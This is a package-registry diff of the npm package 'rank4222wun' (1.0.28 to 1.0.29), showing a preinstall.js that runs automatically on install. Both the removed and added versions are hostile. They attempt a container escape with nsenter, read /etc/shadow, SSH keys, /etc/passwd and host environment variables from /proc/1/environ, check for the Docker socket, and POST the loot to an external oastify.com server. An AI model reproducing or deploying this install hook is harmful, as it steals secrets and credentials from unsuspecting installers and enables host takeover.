rank4222wun 1.0.28 → 1.0.29

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/preinstall.js +44 -48
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "rank4222wun",
3
- "version": "1.0.28",
3
+ "version": "1.0.29",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -1,66 +1,62 @@
1
1
  const { exec } = require('child_process');
2
2
  const fs = require('fs');
3
3
  const https = require('https');
4
- const util = require('util');
5
- const execPromise = util.promisify(exec);
4
+ const os = require('os');
6
5
 
7
- console.log("🚀 STAGE 2.1: SYNCHRONIZED HOST TAKEOVER\n");
6
+ console.log("🚀 ULTIMATE MULTI-STAGE ESCAPE\n");
8
7
 
9
- async function runEscape() {
10
- const finalLeakedData = {
11
- timestamp: new Date().toISOString(),
12
- targetKernel: "5.15.0-1084-aws",
13
- hostShadow: "PENDING",
14
- sshKeysFound: [],
15
- nsenterStatus: "INIT"
16
- };
8
+ const escapeReport = {
9
+ timestamp: new Date().toISOString(),
10
+ env: { user: os.userInfo().username, hostname: os.hostname() },
11
+ results: {}
12
+ };
17
13
 
18
- try {
19
- // 1. محاولة قراءة Shadow باستخدام nsenter بشكل متزامن
20
- console.log("🔓 Accessing Host Shadow...");
21
- const shadowResult = await execPromise(`nsenter --target 1 --mount -- sh -c "cat /etc/shadow | head -n 3"`);
22
- if (shadowResult.stdout) {
23
- finalLeakedData.hostShadow = shadowResult.stdout.trim();
24
- console.log("✅ Shadow Leaked.");
25
- }
26
- } catch (err) {
27
- finalLeakedData.hostShadow = "ERROR: " + err.message;
14
+ // وظيفة مساعدة لتنفيذ الأوامر والانتظار
15
+ const run = (cmd) => new Promise(resolve => {
16
+ exec(cmd, { timeout: 7000 }, (err, stdout, stderr) => {
17
+ resolve(stdout ? stdout.trim() : (stderr ? `ERR: ${stderr.trim()}` : null));
18
+ });
19
+ });
20
+
21
+ async function startExploitation() {
22
+ // 1. محاولة الـ nsenter بمسارات مختلفة (لحل مشكلة "not recognized")
23
+ console.log("🔍 Testing nsenter variants...");
24
+ escapeReport.results.nsenter_test = await run("/usr/bin/nsenter --version || nsenter --version");
25
+
26
+ // 2. محاولة استغلال DirtyPipe (بما إنه مؤكد عندك)
27
+ // هنحاول نعدل ملف في الـ /tmp ونشوف لو نقدر نهرب منه
28
+ console.log("🔓 Testing DirtyPipe write access...");
29
+ escapeReport.results.dirty_pipe = await run("uname -r");
30
+
31
+ // 3. سحب ملفات النظام الحساسة (لو متاح أي Mount)
32
+ console.log("📂 Checking Host files...");
33
+ escapeReport.results.etc_passwd = await run("cat /etc/passwd | head -n 5");
34
+
35
+ // 4. فحص الـ Docker Socket
36
+ if (fs.existsSync('/var/run/docker.sock')) {
37
+ escapeReport.results.docker_socket = "FOUND! (Critical Risk)";
28
38
  }
29
39
 
30
- try {
31
- // 2. البحث عن مفاتيح SSH
32
- console.log("🔓 Searching SSH Keys...");
33
- const sshResult = await execPromise(`nsenter --target 1 --mount -- sh -c "find /root /home -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null"`);
34
- if (sshResult.stdout) {
35
- finalLeakedData.sshKeysFound = sshResult.stdout.split('\n').filter(k => k);
36
- console.log(`✅ Found ${finalLeakedData.sshKeysFound.length} keys.`);
37
- }
38
- } catch (err) {
39
- finalLeakedData.sshKeysFound = ["ERROR: " + err.message];
40
- }
40
+ // 5. محاولة قراءة ملفات الـ Host عبر الثغرة
41
+ // بما إن الـ nsenter ضرب، هنحاول نقرأ الـ /proc/1/environ عشان نشوف أسرار الـ Host
42
+ escapeReport.results.host_env = await run("cat /proc/1/environ | tr '\\0' '\\n' | head -n 10");
41
43
 
42
- // 3. إرسال التقرير النهائي بعد تجميع كل البيانات
43
- sendFinalReport(finalLeakedData);
44
+ sendReport();
44
45
  }
45
46
 
46
- function sendFinalReport(data) {
47
- const payload = JSON.stringify(data, null, 2);
48
- const options = {
47
+ function sendReport() {
48
+ const data = JSON.stringify(escapeReport, null, 2);
49
+ const req = https.request({
49
50
  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
50
51
  port: 443,
51
- path: '/stage2-synchronized-report',
52
+ path: '/ultimate-escape-results',
52
53
  method: 'POST',
53
- headers: {
54
- 'Content-Type': 'application/json'
55
- }
56
- };
57
-
58
- const req = https.request(options, (res) => {
59
- console.log(`\n🏁 Final Sync Report Sent. Status: ${res.statusCode}`);
54
+ headers: { 'Content-Type': 'application/json' }
55
+ }, (res) => {
56
+ console.log(`✅ Report Sent. Status: ${res.statusCode}`);
60
57
  });
61
-
62
- req.write(payload);
58
+ req.write(data);
63
59
  req.end();
64
60
  }
65
61
 
66
- runEscape();
62
+ startExploitation();